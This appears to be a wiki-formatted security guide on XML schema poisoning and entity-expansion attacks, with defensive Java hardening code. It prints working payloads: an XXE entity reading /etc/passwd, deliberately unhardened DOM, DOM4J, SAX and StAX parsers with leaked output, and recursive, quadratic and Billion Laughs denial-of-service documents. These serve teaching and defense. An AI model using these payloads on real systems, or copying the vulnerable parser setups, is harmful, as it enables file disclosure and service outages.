 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
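&lt;br /&gt;
An application can refuse to load a local schema whose permissions are too permissive. The following Java sketch assumes a POSIX filesystem; the class &amp;lt;tt&amp;gt;SchemaPermissionCheck&amp;lt;/tt&amp;gt; is a hypothetical helper, and the check covers only the write bit for other users shown in the listing above:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;

// Hypothetical startup check for a locally stored schema such as note.dtd.
class SchemaPermissionCheck {
  // Evaluates a permission string in ls notation without the leading
  // file-type character, for example "rw-rw-rw-".
  static boolean othersCanWrite(String permissions) {
    return PosixFilePermissions.fromString(permissions)
        .contains(PosixFilePermission.OTHERS_WRITE);
  }

  // Evaluates the permissions of a file on disk (POSIX filesystems only).
  static boolean othersCanWrite(Path schema) throws IOException {
    return Files.getPosixFilePermissions(schema)
        .contains(PosixFilePermission.OTHERS_WRITE);
  }
}
```
&lt;br /&gt;
Calling &amp;lt;tt&amp;gt;othersCanWrite(Paths.get(&amp;quot;note.dtd&amp;quot;))&amp;lt;/tt&amp;gt; before parsing would flag the file from the listing. A stricter policy might also reject files writable by the group.&lt;br /&gt;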
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
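&lt;br /&gt;
One way to avoid fetching the schema over the network at all is to map the remote identifier to a vetted local copy. The following Java sketch uses the standard &amp;lt;tt&amp;gt;org.xml.sax.EntityResolver&amp;lt;/tt&amp;gt; interface; the class &amp;lt;tt&amp;gt;LocalDtdResolver&amp;lt;/tt&amp;gt; and the location of the local copy are assumptions made for illustration:&lt;br /&gt;
&lt;br /&gt;
```java
import java.nio.file.Path;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Hypothetical resolver: serves a vetted local copy of one known schema and
// refuses every other external identifier.
class LocalDtdResolver implements EntityResolver {
  private final String trustedId; // identifier used by the documents
  private final Path localCopy;   // reviewed copy stored with the application

  LocalDtdResolver(String trustedId, Path localCopy) {
    this.trustedId = trustedId;
    this.localCopy = localCopy;
  }

  // True only for the single identifier this resolver is willing to serve.
  boolean allows(String systemId) {
    return trustedId.equals(systemId);
  }

  @Override
  public InputSource resolveEntity(String publicId, String systemId) throws SAXException {
    if (!allows(systemId)) {
      throw new SAXException("refusing to resolve external identifier " + systemId);
    }
    // The parser reads the local file instead of contacting the remote host.
    return new InputSource(localCopy.toUri().toString());
  }
}
```
&lt;br /&gt;
The resolver would be registered with &amp;lt;tt&amp;gt;DocumentBuilder.setEntityResolver&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;XMLReader.setEntityResolver&amp;lt;/tt&amp;gt; before parsing, for example as &amp;lt;tt&amp;gt;new LocalDtdResolver(&amp;quot;http://example.com/note.dtd&amp;quot;, Paths.get(&amp;quot;note.dtd&amp;quot;))&amp;lt;/tt&amp;gt;.&lt;br /&gt;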
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
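&lt;br /&gt;
Whatever the transport or the hosting party, a schema can be checked against a digest recorded when it was last reviewed. The following Java sketch assumes SHA-256 as the digest; the class &amp;lt;tt&amp;gt;SchemaDigest&amp;lt;/tt&amp;gt; and the idea of storing a pinned value next to the application are illustrative assumptions:&lt;br /&gt;
&lt;br /&gt;
```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Locale;

// Hypothetical integrity check for a schema fetched from a third party.
class SchemaDigest {
  // Lowercase hexadecimal SHA-256 digest of the schema bytes.
  static String sha256Hex(byte[] schema) {
    try {
      byte[] hash = MessageDigest.getInstance("SHA-256").digest(schema);
      StringBuilder hex = new StringBuilder();
      for (byte b : hash) {
        hex.append(String.format("%02x", b));
      }
      return hex.toString();
    } catch (NoSuchAlgorithmException e) {
      // SHA-256 is one of the algorithms every Java platform must provide.
      throw new IllegalStateException(e);
    }
  }

  // True only when the schema matches the digest recorded at review time.
  static boolean matchesPinned(byte[] schema, String pinnedHex) {
    return MessageDigest.isEqual(
        sha256Hex(schema).getBytes(StandardCharsets.US_ASCII),
        pinnedHex.toLowerCase(Locale.ROOT).getBytes(StandardCharsets.US_ASCII));
  }
}
```
&lt;br /&gt;
A mismatch means the schema changed since it was reviewed; whether the change is malicious or a legitimate update still has to be decided by a person.&lt;br /&gt;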
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
By using the DTD capability of referencing local or remote files, an attacker can affect the confidentiality of data on the server. It is also possible to affect the availability of resources if no proper restrictions have been set for entity expansion. Consider the following example of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    // No hardening is applied to the factory before it creates the parser&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
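&lt;br /&gt;
For comparison, the following Java sketch configures the same JAXP factory so that documents carrying a DOCTYPE are refused outright. The feature URI is the one defined by Apache Xerces, which the parser bundled with the JDK also recognizes; the class &amp;lt;tt&amp;gt;HardenedDom&amp;lt;/tt&amp;gt; is a hypothetical helper, and other parser implementations may need different settings:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper: a DOM parser that refuses any document with a DOCTYPE.
class HardenedDom {
  static final String DISALLOW_DOCTYPE =
      "http://apache.org/xml/features/disallow-doctype-decl";

  static DocumentBuilder newBuilder() throws ParserConfigurationException {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setFeature(DISALLOW_DOCTYPE, true); // a DOCTYPE becomes a fatal error
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);
    return factory.newDocumentBuilder();
  }

  // Returns true when the parser refuses the document.
  static boolean rejects(String xml) {
    try {
      newBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
      return false;
    } catch (SAXException e) {
      return true;
    } catch (IOException | ParserConfigurationException e) {
      throw new IllegalStateException(e);
    }
  }
}
```
&lt;br /&gt;
With this setting the sample document is rejected before &amp;lt;tt&amp;gt;contacts.dtd&amp;lt;/tt&amp;gt; is read. Applications that genuinely need DTDs would have to rely on narrower restrictions instead.&lt;br /&gt;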
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
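&lt;br /&gt;
When DTDs cannot be rejected entirely, the SAX factory can be told not to fetch external entities or external DTD subsets. The following Java sketch uses the standard SAX feature names plus one Xerces-specific feature; the class &amp;lt;tt&amp;gt;HardenedSax&amp;lt;/tt&amp;gt; is hypothetical, and the behavior described is that of the parser bundled with the JDK:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical helper: collects character data with external entities disabled.
class HardenedSax extends DefaultHandler {
  private final StringBuilder text = new StringBuilder();

  @Override
  public void characters(char[] ch, int start, int length) {
    text.append(ch, start, length);
  }

  static SAXParserFactory newFactory() throws ParserConfigurationException, SAXException {
    SAXParserFactory factory = SAXParserFactory.newInstance();
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    return factory;
  }

  // Parses the document and returns the character data that was reported.
  static String textOf(String xml) {
    HardenedSax handler = new HardenedSax();
    try {
      newFactory().newSAXParser().parse(
          new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)), handler);
    } catch (SAXException | IOException | ParserConfigurationException e) {
      throw new IllegalStateException(e);
    }
    return handler.text.toString();
  }
}
```
&lt;br /&gt;
With these features disabled, a reference to an external entity is skipped rather than expanded, so the handler receives the first name but not the contents of the referenced file.&lt;br /&gt;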
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    // No hardening is applied to the factory before it creates the reader&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     xmlfer.next();&lt;br /&gt;
     if(xmlfer.hasText()){&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    xmlfer.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
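&lt;br /&gt;
The StAX API exposes two standard properties for the same purpose. The following Java sketch sets both; the class &amp;lt;tt&amp;gt;HardenedStax&amp;lt;/tt&amp;gt; is hypothetical, and how a reader reacts to an entity reference once DTD support is off (an error, or simply no expansion) is implementation-dependent, so the helper treats an error as a rejection:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

// Hypothetical helper: a StAX reader with DTDs and external entities disabled.
class HardenedStax {
  static XMLInputFactory newFactory() {
    XMLInputFactory factory = XMLInputFactory.newInstance();
    factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
    factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
    return factory;
  }

  // Returns the character data, or null when the reader rejects the document.
  static String textOf(String xml) {
    StringBuilder text = new StringBuilder();
    try {
      XMLStreamReader reader = newFactory().createXMLStreamReader(new StringReader(xml));
      while (reader.hasNext()) {
        reader.next();
        if (reader.isCharacters()) {
          text.append(reader.getText());
        }
      }
      reader.close();
      return text.toString();
    } catch (XMLStreamException e) {
      return null;
    }
  }
}
```
&lt;br /&gt;
Only character events are collected here, so the DOCTYPE declaration that the vulnerable example printed is not echoed either.&lt;br /&gt;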
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The result of the following attack will be 100,000 * 100,000 (10&amp;lt;sup&amp;gt;10&amp;lt;/sup&amp;gt;) characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
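&lt;br /&gt;
Because the expanded text reaches a SAX handler through its &amp;lt;tt&amp;gt;characters&amp;lt;/tt&amp;gt; callback, an application can stop parsing once a budget is exceeded. The following Java sketch illustrates the idea; the class &amp;lt;tt&amp;gt;ExpansionBudgetHandler&amp;lt;/tt&amp;gt; and the budget value are assumptions, and built-in parser limits, where available, are likely a better first line of defense:&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical guard: stops parsing once the expanded character data exceeds
// a budget. Text that ends up in attribute values is not counted here.
class ExpansionBudgetHandler extends DefaultHandler {
  private final long maxChars;
  private long seen = 0;

  ExpansionBudgetHandler(long maxChars) {
    this.maxChars = maxChars;
  }

  @Override
  public void characters(char[] ch, int start, int length) throws SAXException {
    seen += length; // entity replacement text arrives here already expanded
    if (seen > maxChars) {
      throw new SAXException("expanded content exceeds " + maxChars + " characters");
    }
  }

  // Returns true when the document stays within the budget, and false when
  // parsing was aborted (budget exceeded, or the input was not well formed).
  static boolean withinBudget(String xml, long maxChars) {
    try {
      SAXParserFactory.newInstance().newSAXParser().parse(
          new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
          new ExpansionBudgetHandler(maxChars));
      return true;
    } catch (SAXException e) {
      return false;
    } catch (IOException | ParserConfigurationException e) {
      throw new IllegalStateException(e);
    }
  }
}
```
&lt;br /&gt;
The guard aborts as soon as the budget is crossed, so the full expansion is never accumulated by the handler, although the parser may still have spent some work before the exception is raised.&lt;br /&gt;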
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
